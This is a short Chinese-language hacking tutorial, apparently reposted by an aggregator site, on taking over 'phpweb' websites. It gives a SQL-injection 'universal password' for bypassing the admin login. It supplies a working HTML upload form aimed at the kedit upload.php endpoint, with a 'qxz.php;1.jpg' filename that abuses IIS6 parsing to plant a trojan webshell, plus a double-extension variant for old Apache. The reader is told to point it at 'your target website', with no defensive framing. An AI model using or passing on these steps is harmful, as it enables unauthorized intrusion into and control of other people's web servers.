首先登錄后臺admin.php(默認后臺admin.php)

有的phpweb網站存在萬能密碼登錄

帳號密碼都輸入：admin 'or '1'='1直接登錄

登錄后臺管理系統后，然后把下面的文件保存為xxx.html，修改action，把www.xxx.com?改成你的目標網站地址。?

<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php"> <input type="text" name="fileName" value="qxz.php;1.jpg" /> <input type="hidden" name="attachPath" value="news/pics/" /> <input type="file" name="fileData" size="14" /></td> <input type="submit" name="button" value="確定" /> </form> 然后選擇你的馬兒再上傳

上傳后如果為iis6，就點擊查看源碼就可以找到馬兒的路徑了。

PS：qxz.php;1.jpg這樣的文件是允許上傳的，只要服務器是IIS6就拿到webshell，低版本的apache可以試著重命名為qxz.php.jpg

總結

以上是生活随笔為你收集整理的phpweb后台拿shell方法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。